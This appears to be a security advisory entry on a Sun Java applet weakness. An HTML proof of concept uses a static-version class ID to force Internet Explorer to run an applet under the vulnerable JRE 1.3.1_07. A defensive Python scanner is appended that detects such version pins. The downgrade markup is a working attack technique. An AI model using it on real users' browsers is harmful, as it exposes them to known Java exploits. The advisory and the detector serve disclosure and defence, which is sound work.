Sun Java Applet Invocation Version Specification Weakness
An exploit is not required. The following example was provided:

<html>
<title> Java Version Downgrade proof-of-concept </title>
<body>
Demonstration uses the following vulnerability: <br>
http://www.securityfocus.com/bid/8879 <br>
Source code for Simple.class: <br>
http://www.securityfocus.com/bid/8879/exploit/
<p>
Added this code to Simple.java for debugging purposes: <br>
String javaVersion = System.getProperty("java.version"); <br>
addItem("Java version: " + javaVersion);
<p>
This proof-of-concept was tested on a Windows system using IE with the following Java installations: <br>
Sun JRE 1.3.1_07 (vulnerable to BID 8879) <br>
Sun JRE 1.3.1_13 (not vulnerable to BID 8879) <br>
note: invoking applet normally should run Simple.class in JRE 1.3.1_13.
<p>
<OBJECT classid="clsid:CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA"
        width = "600" height = "100"
        codebase="http://java.sun.com/products/plugin/autodl/jinstall-1_3_1_07-windows-i586.cab##Version=1_3_1_07">
<PARAM NAME="code" VALUE="Simple.class">
</OBJECT>
</body>
</html>
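Added example, not part of the original advisory or proof-of-concept: a content check that finds OBJECT tags pinning a specific JRE through a static-version class ID and reports those older than a chosen baseline. The decoding of the class ID fields is an assumption drawn from the page's sample (0013-0001-0007 for 1.3.1_07); the names decode_pinned_jre, find_downgrades and SAMPLE are hypothetical.

```python
import re
from html.parser import HTMLParser

# Static-version class ID, as in the page's sample:
#   CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA -> JRE 1.3.1_07
# Assumption: fields are decimal; FFFF in the last field means "any update".
STATIC_CLSID = re.compile(
    r"^clsid:CAFEEFAC-(\d{4})-(\d{4})-(\d{4}|FFFF)-ABCDEFFEDCBA$", re.I)

# Constructed sample: the page's pinned OBJECT tag plus a dynamic-version one.
SAMPLE = """<OBJECT classid="clsid:CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA" width="600">
<PARAM NAME="code" VALUE="Simple.class"></OBJECT>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"></object>"""


def decode_pinned_jre(classid):
    """Return (major, minor, micro, update), or None if not a static-version ID."""
    m = STATIC_CLSID.match(classid.strip())
    if not m:
        return None
    major, minor = divmod(int(m.group(1)), 10)
    update = None if m.group(3).upper() == "FFFF" else int(m.group(3))
    return (major, minor, int(m.group(2)), update)


class ObjectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.classids = []

    def handle_starttag(self, tag, attrs):
        classid = dict(attrs).get("classid")
        if tag == "object" and classid:
            self.classids.append(classid)


def find_downgrades(html, minimum):
    """Return pinned JRE versions in html that are older than `minimum`."""
    scanner = ObjectScanner()
    scanner.feed(html)
    findings = []
    for pinned in map(decode_pinned_jre, scanner.classids):
        if pinned is None:
            continue
        # A family ID has no update number, so compare on the family only.
        width = 3 if pinned[3] is None else 4
        if pinned[:width] < minimum[:width]:
            findings.append(pinned)
    return findings
```

With the page's figures, find_downgrades(SAMPLE, (1, 3, 1, 13)) reports the 1.3.1_07 pin, since 1.3.1_13 is the release the page lists as not vulnerable to BID 8879.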